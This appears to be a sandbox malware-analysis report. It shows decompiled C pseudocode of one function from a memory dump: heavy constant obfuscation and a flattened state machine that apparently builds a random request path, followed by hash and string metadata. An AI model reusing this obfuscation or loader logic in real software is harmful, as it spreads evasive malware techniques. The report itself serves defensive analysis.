                                                      				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) * 5;
                                                      				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xc752;
                                                      				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00008c7a;
                                                      				 *(_t950 + 0x108) = 0x3cbe;
                                                      				 *(_t950 + 0x108) =  *(_t950 + 0x108) >> 0xb;
                                                      				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00006997;
                                                      				 *(_t950 + 0x68) = 0xe725;
                                                      				 *(_t950 + 0x68) =  *(_t950 + 0x68) + 0xffffecd7;
                                                      				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 5;
                                                      				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x001a364c;
                                                      				 *(_t950 + 0xb8) = 0xbf58;
                                                      				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) + 0xf62e;
                                                      				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) | 0xa3709140;
                                                      				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) ^ 0xa3719bce;
                                                      				 *(_t950 + 0x100) = 0xd5da;
                                                      				 *(_t950 + 0x100) =  *(_t950 + 0x100) + 0xa0be;
                                                      				 *(_t950 + 0x100) =  *(_t950 + 0x100) ^ 0x000119e9;
                                                      				 *(_t950 + 0x54) = 0x395a;
                                                      				 *(_t950 + 0x54) =  *(_t950 + 0x54) << 0xb;
                                                      				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x65ad419f;
                                                      				 *(_t950 + 0x54) =  *(_t950 + 0x54) + 0xffff95a8;
                                                      				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x64673eb6;
                                                      				 *(_t950 + 0xd4) = 0x77ed;
                                                      				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) / _t924;
                                                      				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) ^ 0x00006bf4;
                                                      				 *(_t950 + 0x114) = 0x68ca;
                                                      				 *(_t950 + 0x114) =  *(_t950 + 0x114) << 5;
                                                      				 *(_t950 + 0x114) =  *(_t950 + 0x114) ^ 0x000d4b7f;
                                                      				 *(_t950 + 0xdc) = 0x2f2e;
                                                      				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) << 7;
                                                      				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) ^ 0x0017b89d;
                                                      				 *(_t950 + 0x24) = 0x5bdf;
                                                      				_t925 = 0xa;
                                                      				 *(_t950 + 0x28) =  *(_t950 + 0x24) / _t925;
                                                      				_t926 = 0x47;
                                                      				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x43;
                                                      				 *(_t950 + 0x28) =  *(_t950 + 0x28) >> 0xf;
                                                      				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x000071e1;
                                                      				 *(_t950 + 0x40) = 0xbbeb;
                                                      				 *(_t950 + 0x40) =  *(_t950 + 0x40) + 0xd8ab;
                                                      				 *(_t950 + 0x40) =  *(_t950 + 0x40) << 3;
                                                      				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0x75fd3d75;
                                                      				 *(_t950 + 0x40) =  *(_t950 + 0x40) ^ 0x75fd8dbb;
                                                      				 *(_t950 + 0xb0) = 0x7d23;
                                                      				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) >> 6;
                                                      				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) | 0xd94c1b0d;
                                                      				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) ^ 0xd94c252c;
                                                      				 *(_t950 + 0x60) = 0xae03;
                                                      				 *(_t950 + 0x60) =  *(_t950 + 0x60) << 6;
                                                      				 *(_t950 + 0x60) =  *(_t950 + 0x60) + 0x7f22;
                                                      				 *(_t950 + 0x60) =  *(_t950 + 0x60) ^ 0x002b81ed;
                                                      				 *(_t950 + 0xe4) = 0xc6a2;
                                                      				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) + 0x25fd;
                                                      				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) ^ 0x0000ec93;
                                                      				 *(_t950 + 0x5c) = 0xaf00;
                                                      				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) / _t926;
                                                      				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x47fef2c1;
                                                      				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) >> 1;
                                                      				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x23ff7799;
                                                      				 *(_t950 + 0x24) = 0xf54a;
                                                      				 *(_t950 + 0x24) =  *(_t950 + 0x24) | 0x369a6272;
                                                      				 *(_t950 + 0x24) =  *(_t950 + 0x24) >> 8;
                                                      				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x5776ac87;
                                                      				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x57402b8a;
                                                      				 *(_t950 + 0x124) = 0xcc46;
                                                      				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6df670;
                                                      				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6d578c;
                                                      				 *(_t950 + 0x12c) = 0x5a4b;
                                                      				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6f91;
                                                      				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6ca3;
                                                      				 *(_t950 + 0x34) = 0x6135;
                                                      				_t927 = 0xf;
                                                      				 *(_t950 + 0x30) =  *(_t950 + 0x34) / _t927;
                                                      				 *(_t950 + 0x30) =  *(_t950 + 0x30) + 0x3b37;
                                                      				 *(_t950 + 0x30) =  *(_t950 + 0x30) >> 7;
                                                      				 *(_t950 + 0x30) =  *(_t950 + 0x30) ^ 0x0000396d;
                                                      				 *(_t950 + 0xfc) = 0x664c;
                                                      				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) * 0x2d;
                                                      				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) ^ 0x0011c86c;
                                                      				 *(_t950 + 0x7c) = 0x54c3;
                                                      				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) >> 0xa;
                                                      				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) << 6;
                                                      				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0x00004b81;
                                                      				 *(_t950 + 0x28) = 0x1122;
                                                      				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x62eeb120;
                                                      				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x3c;
                                                      				 *(_t950 + 0x28) =  *(_t950 + 0x28) + 0xc705;
                                                      				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x2fee2b8f;
                                                      				 *(_t950 + 0x40) = 0x14c1;
                                                      				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0xecde44ed;
                                                      				_t928 = 0x27;
                                                      				 *(_t950 + 0x44) =  *(_t950 + 0x40) / _t928;
                                                      				 *(_t950 + 0x44) =  *(_t950 + 0x44) >> 6;
                                                      				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x00184119;
                                                      				 *(_t950 + 0x3c) = 0x8f59;
                                                      				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) << 9;
                                                      				_t929 = 7;
                                                      				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t929;
                                                      				_t930 = 0x30;
                                                      				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t930;
                                                      				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) ^ 0x00009f8e;
                                                      				 *(_t950 + 0x108) = 0x8114;
                                                      				 *(_t950 + 0x108) =  *(_t950 + 0x108) + 0xffffe072;
                                                      				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00007574;
                                                      				 *(_t950 + 0x68) = 0x1eec;
                                                      				 *(_t950 + 0x68) =  *(_t950 + 0x68) >> 5;
                                                      				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 9;
                                                      				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x0001b084;
                                                      				 *(_t950 + 0x64) = 0x2753;
                                                      				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x81763235;
                                                      				 *(_t950 + 0x64) =  *(_t950 + 0x64) << 3;
                                                      				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x0bb0ddd8;
                                                      				 *(_t950 + 0x1c) = 0xf5b7;
                                                      				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) | 0x35534ee5;
                                                      				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 9;
                                                      				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 7;
                                                      				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) ^ 0x00003d7d;
                                                      				 *(_t950 + 0x38) = 0x2f43;
                                                      				_t931 = 0x4b;
                                                      				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t931;
                                                      				_t932 = 0x3a;
                                                      				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t932;
                                                      				 *(_t950 + 0x38) =  *(_t950 + 0x38) + 0xffff5ca5;
                                                      				 *(_t950 + 0x38) =  *(_t950 + 0x38) ^ 0xffff1d3e;
                                                      				 *(_t950 + 0xf8) = 0xec82;
                                                      				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) + 0x609d;
                                                      				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x00011376;
                                                      				 *(_t950 + 0x94) = 0xef51;
                                                      				_t933 = 0x32;
                                                      				 *(_t950 + 0x94) =  *(_t950 + 0x94) / _t933;
                                                      				_t934 = 0x11;
                                                      				 *(_t950 + 0x90) =  *(_t950 + 0x94) * 0x31;
                                                      				 *(_t950 + 0x90) =  *(_t950 + 0x90) ^ 0x00009894;
                                                      				 *(_t950 + 0xc8) = 0xb312;
                                                      				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) << 0xd;
                                                      				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) ^ 0x16624d53;
                                                      				 *(_t950 + 0x98) = 0x3fa5;
                                                      				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0x4ab7;
                                                      				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0xffffdc08;
                                                      				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x000078cc;
                                                      				 *(_t950 + 0x50) = 0xcffd;
                                                      				 *(_t950 + 0x50) =  *(_t950 + 0x50) / _t934;
                                                      				 *(_t950 + 0x50) =  *(_t950 + 0x50) | 0x42e0f56c;
                                                      				 *(_t950 + 0x50) =  *(_t950 + 0x50) + 0x6d22;
                                                      				 *(_t950 + 0x50) =  *(_t950 + 0x50) ^ 0x42e14cb6;
                                                      				 *(_t950 + 0xd8) = 0x2cbc;
                                                      				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb4586e51;
                                                      				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb45852ed;
                                                      				 *(_t950 + 0x48) = 0xee7b;
                                                      				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 0xd;
                                                      				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 9;
                                                      				 *(_t950 + 0x48) =  *(_t950 + 0x48) | 0xafcc7f53;
                                                      				 *(_t950 + 0x48) =  *(_t950 + 0x48) ^ 0xbfcc5369;
                                                      				 *(_t950 + 0xd0) = 0xc42e;
                                                      				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) | 0xd678f7f1;
                                                      				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) ^ 0xd678b2fb;
                                                      				 *(_t950 + 0xcc) = 0xa2cf;
                                                      				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x45343d70;
                                                      				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x4534d4ad;
                                                      				 *(_t950 + 0x11c) = 0xb9db;
                                                      				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) + 0xffff1101;
                                                      				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) ^ 0xffffae8b;
                                                      				 *(_t950 + 0x88) = 0xfaa3;
                                                      				 *(_t950 + 0x88) =  *(_t950 + 0x88) << 6;
                                                      				 *(_t950 + 0x88) =  *(_t950 + 0x88) + 0xcdb3;
                                                      				 *(_t950 + 0x88) =  *(_t950 + 0x88) ^ 0x003f3af5;
                                                      				 *(_t950 + 0xc0) = 0xa294;
                                                      				_t935 = 0x7e;
                                                      				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) / _t935;
                                                      				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019d3d1;
                                                      				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019fef7;
                                                      				 *(_t950 + 0x80) = 0xa0b2;
                                                      				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 1;
                                                      				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 3;
                                                      				 *(_t950 + 0x80) =  *(_t950 + 0x80) ^ 0x000a45e8;
                                                      				 *(_t950 + 0x74) = 0x61f;
                                                      				 *(_t950 + 0x74) =  *(_t950 + 0x74) + 0xffff105e;
                                                      				 *(_t950 + 0x74) =  *(_t950 + 0x74) << 2;
                                                      				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0xfffc558b;
                                                      				 *(_t950 + 0x1c) = 0xc0d2;
                                                      				 *(_t950 + 0x20) =  *(_t950 + 0x1c) / _t804;
                                                      				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff43f4;
                                                      				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff6466;
                                                      				 *(_t950 + 0x20) =  *(_t950 + 0x20) ^ 0xfffed62d;
                                                      				 *(_t950 + 0x70) = 0xbc2e;
                                                      				 *(_t950 + 0x70) =  *(_t950 + 0x70) >> 0xa;
                                                      				_t936 = 0x17;
                                                      				 *(_t950 + 0x70) =  *(_t950 + 0x70) / _t936;
                                                      				 *(_t950 + 0x70) =  *(_t950 + 0x70) ^ 0x00000c9d;
                                                      				 *(_t950 + 0xfc) = 0xf001;
                                                      				_t937 = 0x14;
                                                      				 *(_t950 + 0xf8) =  *(_t950 + 0xfc) * 0x7c;
                                                      				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x0074021d;
                                                      				 *(_t950 + 0xc4) = 0x7c98;
                                                      				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) << 9;
                                                      				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2380f655;
                                                      				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2379c4d7;
                                                      				 *(_t950 + 0xbc) = 0xfd89;
                                                      				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) + 0xffff54c6;
                                                      				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) / _t937;
                                                      				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) ^ 0x00005764;
                                                      				_t805 =  *(_t950 + 0x13c);
                                                      				 *(_t950 + 0x10) =  *(_t950 + 0x140);
                                                      				while(1) {
                                                      					L1:
                                                      					_t896 =  *(_t950 + 0x14);
                                                      					while(1) {
                                                      						L2:
                                                      						while(1) {
                                                      							L3:
                                                      							_t954 = _t806 - 0x1dc05553;
                                                      							if(_t954 > 0) {
                                                      								goto L27;
                                                      							}
                                                      							L4:
                                                      							if(_t954 == 0) {
                                                      								_push( *((intOrPtr*)(_t950 + 0x120)));
                                                      								E002329E3(_t950 + 0x274, 0x400, E0024889D(0x24c6a0,  *(_t950 + 0x24), __eflags),  *(_t950 + 0x140),  *(_t950 + 0x44),  *(_t950 + 0x10c), _t950 + 0x17c, _t950 + 0x478,  *(_t950 + 0x80),  *(_t950 + 0x28));
                                                      								_t950 = _t950 + 0x24;
                                                      								E00242025( *(_t950 + 0x48), _t760,  *(_t950 + 0x3c),  *((intOrPtr*)(_t950 + 0x104)));
                                                      								_t751 =  *(_t950 + 0x18);
                                                      								_t806 = 0x23448a49;
                                                      								while(1) {
                                                      									L1:
                                                      									_t896 =  *(_t950 + 0x14);
                                                      									goto L2;
                                                      								}
                                                      							} else {
                                                      								_t955 = _t806 - 0x160634a6;
                                                      								if(_t955 > 0) {
                                                      									__eflags = _t806 - 0x16d97506;
                                                      									if(_t806 == 0x16d97506) {
                                                      										E0023F536( *(_t950 + 0x7c),  *(_t950 + 0x24),  *(_t950 + 0x70),  *((intOrPtr*)(_t950 + 0x144)));
                                                      										_t806 = 0x36d580c3;
                                                      										goto L13;
                                                      									} else {
                                                      										__eflags = _t806 - 0x1a0940a4;
                                                      										if(_t806 == 0x1a0940a4) {
                                                      											E0023839D(_t950 + 0x170, _t917);
                                                      											_t806 = 0x1dc05553;
                                                      											goto L13;
                                                      										} else {
                                                      											__eflags = _t806 - 0x1a22d724;
                                                      											if(_t806 != 0x1a22d724) {
                                                      												goto L44;
                                                      											} else {
                                                      												 *(_t950 + 0x138) =  *(_t950 + 0x138) & 0x00000000;
                                                      												 *(_t950 + 0x140) =  *(_t950 + 0x140) & 0x00000000;
                                                      												_t832 = _t950 + 0x13c;
                                                      												E0023C769(_t832, _t950 + 0x170,  *(_t950 + 0x88),  *(_t950 + 0x80), _t950 + 0x20c,  *(_t950 + 0x30), _t896, _t950 + 0x280, _t950 + 0x474,  *(_t950 + 0x3c),  *(_t950 + 0xf8),  *(_t950 + 0x90));
                                                      												_t950 = _t950 + 0x28;
                                                      												asm("sbb ecx, ecx");
                                                      												_t806 = (_t832 & 0xd5e50b3a) + 0x355eeb92;
                                                      												goto L13;
                                                      											}
                                                      										}
                                                      									}
                                                      								} else {
                                                      									if(_t955 == 0) {
                                                      										 *(_t950 + 0x160) = _t751;
                                                      										 *((intOrPtr*)(_t950 + 0x15c)) = 1;
                                                      										 *(_t950 + 0x160) = _t805;
                                                      										E002396CD(_t950 + 0x148,  *((intOrPtr*)(_t950 + 0xac)), _t950 + 0x158,  *(_t950 + 0x118));
                                                      										_pop(_t836);
                                                      										asm("sbb ecx, ecx");
                                                      										_t806 = (_t836 & 0x02a7bfa7) + 0x36d580c3;
                                                      										goto L13;
                                                      									} else {
                                                      										if(_t806 == 0x6ef04) {
                                                      											E0023F536( *(_t950 + 0x90),  *(_t950 + 0xc8),  *(_t950 + 0x84),  *(_t950 + 0x13c));
                                                      											_t806 = 0x16d97506;
                                                      											goto L13;
                                                      										} else {
                                                      											if(_t806 == 0x9a9cbcb) {
                                                      												_push(_t806);
                                                      												_push( *((intOrPtr*)(_t917 + 4)));
                                                      												_t941 = E002478B7(_t806);
                                                      												_t951 = _t950 + 4;
                                                      												_t805 = E00238736(_t780);
                                                      												__eflags = _t805;
                                                      												if(__eflags != 0) {
                                                      													_t751 = E00246B8A(_t941,  *((intOrPtr*)(_t951 + 0x58)), __eflags,  *((intOrPtr*)(_t951 + 0xfc)), _t805,  *_t917,  *((intOrPtr*)(_t951 + 0x30)),  *((intOrPtr*)(_t917 + 4)));
                                                      													_t950 = _t951 + 0x14;
                                                      													 *(_t950 + 0x10) = _t751;
                                                      													__eflags = _t751;
                                                      													if(__eflags == 0) {
                                                      														_push(_t805);
                                                      														_push( *(_t950 + 0xec));
                                                      														_t903 =  *(_t950 + 0xf8);
                                                      														_t817 =  *(_t950 + 0xbc);
                                                      														L48:
                                                      														E0023F536(_t817, _t903);
                                                      													} else {
                                                      														_t806 = 0x160634a6;
                                                      														while(1) {
                                                      															L1:
                                                      															_t896 =  *(_t950 + 0x14);
                                                      															goto L2;
                                                      														}
                                                      													}
                                                      												}
                                                      											} else {
                                                      												if(_t806 == 0xb43f6cc) {
                                                      													__eflags = E00249B45( *((intOrPtr*)(_t950 + 0xc74)),  *(_t950 + 0xd0),  *(_t950 + 0x9c), _t950 + 0x134);
                                                      													_t946 =  !=  ? 1 : _t946;
                                                      													_t806 = 0x2a19e3bf;
                                                      													 *(_t950 + 0x130) = _t946;
                                                      													L13:
                                                      													_t751 =  *(_t950 + 0x10);
                                                      													goto L14;
                                                      												} else {
                                                      													_t959 = _t806 - 0x13765d88;
                                                      													if(_t806 != 0x13765d88) {
                                                      														L44:
                                                      														__eflags = _t806 - 0x1a8884c7;
                                                      														if(__eflags != 0) {
                                                      															L14:
                                                      															_t896 =  *(_t950 + 0x14);
                                                      															continue;
                                                      														}
                                                      													} else {
                                                      														_push( *(_t950 + 0x108));
                                                      														_t787 = E0024889D(0x24c660,  *(_t950 + 0xa8), _t959);
                                                      														_t788 =  *0x24ca38; // 0x0
                                                      														_t790 =  *0x24ca38; // 0x0
                                                      														_t793 =  *0x24ca38; // 0x0
                                                      														E00247C6E(( *_t788)[2] & 0x000000ff, _t959,  *_t788, ( *_t788)[3] & 0x000000ff,  *(_t950 + 0x88),  *( *_t793) & 0x000000ff,  *(_t950 + 0xd0), ( *_t790)[1] & 0x000000ff,  *(_t950 + 0x110),  *(_t950 + 0x60),  *(_t950 + 0xdc),  *(_t950 + 0x118), _t950 + 0x1f0);
                                                      														_t950 = _t950 + 0x2c;
                                                      														E00242025( *(_t950 + 0xe4), _t787,  *(_t950 + 0x28),  *(_t950 + 0x3c));
                                                      														_t799 =  *0x24ca38; // 0x0
                                                      														_t806 = 0x261be6d7;
                                                      														_t896 = ( *_t799)[4] & 0x0000ffff;
                                                      														_t751 =  *(_t950 + 0x10);
                                                      														 *(_t950 + 0x14) = ( *_t799)[4] & 0x0000ffff;
                                                      														L2:
                                                      														L3:
                                                      														_t954 = _t806 - 0x1dc05553;
                                                      														if(_t954 > 0) {
                                                      															goto L27;
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							L49:
                                                      							return _t946;
                                                      							L27:
                                                      							__eflags = _t806 - 0x23448a49;
                                                      							if(_t806 == 0x23448a49) {
                                                      								__eflags = E0024511B(_t950 + 0x140, _t950 + 0x174, _t950 + 0x14c);
                                                      								if(__eflags == 0) {
                                                      									_t806 = 0x6ef04;
                                                      									goto L44;
                                                      								} else {
                                                      									_t806 = 0x1a22d724;
                                                      									goto L13;
                                                      								}
                                                      							} else {
                                                      								__eflags = _t806 - 0x261be6d7;
                                                      								if(_t806 == 0x261be6d7) {
                                                      									_t918 = _t950 + 0x270;
                                                      									_t809 = 6;
                                                      									_t948 =  *(_t950 + 0x12c) % _t809 + 1;
                                                      									__eflags = _t948;
                                                      									while(__eflags != 0) {
                                                      										_t945 = ( *(_t950 + 0x130) & 0x0000000f) + 4;
                                                      										E0023D6C9( *(_t950 + 0x68), _t918, 1, _t945,  *(_t950 + 0xe8), _t950 + 0x130,  *((intOrPtr*)(_t950 + 0x58)));
                                                      										_t950 = _t950 + 0x18;
                                                      										_t919 = _t918 + _t945 * 2;
                                                      										_t803 = 0x2f;
                                                      										 *_t919 = _t803;
                                                      										_t918 = _t919 + 2;
                                                      										_t948 = _t948 - 1;
                                                      										__eflags = _t948;
                                                      									}
                                                      									_t946 =  *(_t950 + 0x130);
                                                      									 *_t918 = 0;
                                                      									_t806 = 0x1a0940a4;
                                                      									_t917 =  *((intOrPtr*)(_t950 + 0xc78));
                                                      									goto L1;
                                                      								} else {
                                                      									__eflags = _t806 - 0x2a19e3bf;
                                                      									if(_t806 == 0x2a19e3bf) {
                                                      										E0023F536( *((intOrPtr*)(_t950 + 0x58)),  *((intOrPtr*)(_t950 + 0xe0)),  *(_t950 + 0x4c),  *((intOrPtr*)(_t950 + 0x134)));
                                                      										_t806 = 0x355eeb92;
                                                      										goto L13;
                                                      									} else {
                                                      										__eflags = _t806 - 0x2ca20b85;
                                                      										if(_t806 == 0x2ca20b85) {
                                                      											 *(_t950 + 0x12c) = E00248C8F(_t806);
                                                      											_t806 = 0x9a9cbcb;
                                                      											goto L13;
                                                      										} else {
                                                      											__eflags = _t806 - 0x355eeb92;
                                                      											if(_t806 == 0x355eeb92) {
                                                      												E0023F536( *(_t950 + 0xd8),  *(_t950 + 0xd4),  *((intOrPtr*)(_t950 + 0x120)),  *((intOrPtr*)(_t950 + 0x14c)));
                                                      												_t806 = 0x6ef04;
                                                      												goto L13;
                                                      											} else {
                                                      												__eflags = _t806 - 0x36d580c3;
                                                      												if(_t806 == 0x36d580c3) {
                                                      													_push(_t805);
                                                      													_push( *(_t950 + 0xc0));
                                                      													_t903 =  *(_t950 + 0xcc);
                                                      													_t817 =  *(_t950 + 0x100);
                                                      													goto L48;
                                                      												} else {
                                                      													__eflags = _t806 - 0x397d406a;
                                                      													if(_t806 != 0x397d406a) {
                                                      														goto L44;
                                                      													} else {
                                                      														_t820 =  *(_t950 + 0x118);
                                                      														E0023F98C(_t950 + 0x14c, _t950 + 0x140,  *(_t950 + 0x94),  *((intOrPtr*)(_t950 + 0x128)),  *(_t950 + 0x84));
                                                      														_t950 = _t950 + 0x10;
                                                      														asm("sbb ecx, ecx");
                                                      														_t806 = (_t820 & 0xfc9ce882) + 0x16d97506;
                                                      														goto L13;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							goto L49;
                                                      						}
                                                      					}
                                                      				}
                                                      			}
                                                      0x0023ac60
                                                      0x0023ac60
                                                      0x0023aa9d
                                                      0x0023aa9d
                                                      0x0023aa9d
                                                      0x00000000
                                                      0x0023aa9d
                                                      0x0023aa9d
                                                      0x0023ac5a
                                                      0x0023aae0
                                                      0x0023aae6
                                                      0x0023abcb
                                                      0x0023abcf
                                                      0x0023abd2
                                                      0x0023abd7
                                                      0x0023abde
                                                      0x0023abde
                                                      0x00000000
                                                      0x0023aaec
                                                      0x0023aaec
                                                      0x0023aaf2
                                                      0x0023b006
                                                      0x0023b006
                                                      0x0023b00c
                                                      0x0023abe2
                                                      0x0023abe2
                                                      0x00000000
                                                      0x0023abe2
                                                      0x0023aaf8
                                                      0x0023aaf8
                                                      0x0023ab0b
                                                      0x0023ab12
                                                      0x0023ab3b
                                                      0x0023ab4e
                                                      0x0023ab6c
                                                      0x0023ab71
                                                      0x0023ab85
                                                      0x0023ab8a
                                                      0x0023ab91
                                                      0x0023ab98
                                                      0x0023ab9c
                                                      0x0023aba0
                                                      0x0023aaa1
                                                      0x0023aaa4
                                                      0x0023aaa4
                                                      0x0023aaaa
                                                      0x00000000
                                                      0x00000000
                                                      0x0023aaaa
                                                      0x0023aaf2
                                                      0x0023aae6
                                                      0x0023aada
                                                      0x0023aace
                                                      0x0023aac2
                                                      0x0023aabc
                                                      0x0023b04a
                                                      0x0023b054
                                                      0x0023ae42
                                                      0x0023ae42
                                                      0x0023ae48
                                                      0x0023afef
                                                      0x0023aff1
                                                      0x0023b001
                                                      0x00000000
                                                      0x0023aff3
                                                      0x0023aff3
                                                      0x00000000
                                                      0x0023aff3
                                                      0x0023ae4e
                                                      0x0023ae4e
                                                      0x0023ae54
                                                      0x0023af59
                                                      0x0023af64
                                                      0x0023af69
                                                      0x0023af69
                                                      0x0023af6a
                                                      0x0023af94
                                                      0x0023af9b
                                                      0x0023afa0
                                                      0x0023afa3
                                                      0x0023afa8
                                                      0x0023afa9
                                                      0x0023afac
                                                      0x0023afaf
                                                      0x0023afaf
                                                      0x0023afaf
                                                      0x0023afb2
                                                      0x0023afbb
                                                      0x0023afbe
                                                      0x0023afc7
                                                      0x00000000
                                                      0x0023ae5a
                                                      0x0023ae5a
                                                      0x0023ae60
                                                      0x0023af41
                                                      0x0023af48
                                                      0x00000000
                                                      0x0023ae66
                                                      0x0023ae66
                                                      0x0023ae6c
                                                      0x0023af1a
                                                      0x0023af21
                                                      0x00000000
                                                      0x0023ae72
                                                      0x0023ae72
                                                      0x0023ae78
                                                      0x0023aef6
                                                      0x0023aefd
                                                      0x00000000
                                                      0x0023ae7a
                                                      0x0023ae7a
                                                      0x0023ae80
                                                      0x0023b02b
                                                      0x0023b02c
                                                      0x0023b033
                                                      0x0023b03a
                                                      0x00000000
                                                      0x0023ae86
                                                      0x0023ae86
                                                      0x0023ae8c
                                                      0x00000000
                                                      0x0023ae92
                                                      0x0023aeb5
                                                      0x0023aebd
                                                      0x0023aec2
                                                      0x0023aec7
                                                      0x0023aecf
                                                      0x00000000
                                                      0x0023aecf
                                                      0x0023ae8c
                                                      0x0023ae80
                                                      0x0023ae78
                                                      0x0023ae6c
                                                      0x0023ae60
                                                      0x0023ae54
                                                      0x00000000
                                                      0x0023ae48
                                                      0x0023aaa4
                                                      0x0023aaa1

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "m$#}$%$./$25$5a$<8$=;$C/$KZ$Lf$M#$Q[$Q$S'$Z9$cA$dW$j@}9$jg$m$m9$nXj$p=4E$tu${$}=$E$NS5$q$w
                                                      • API String ID: 0-3061497230
                                                      • Opcode ID: 35b7cc4ae7f77b57a18cac2bc78a2fbaecb881c1dae8adcf1a590354b22caa4a
                                                      • Instruction ID: 524ec21124ab27be4ae54ebcecb4891c3d8bfbad67950b5eaa8dd6e60b4fff16
                                                      • Opcode Fuzzy Hash: 35b7cc4ae7f77b57a18cac2bc78a2fbaecb881c1dae8adcf1a590354b22caa4a
                                                      • Instruction Fuzzy Hash: 978224B151C3818BE378CF25C549B9BBBE2BBC4314F10891DE2DA86260DBB59959CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 95%
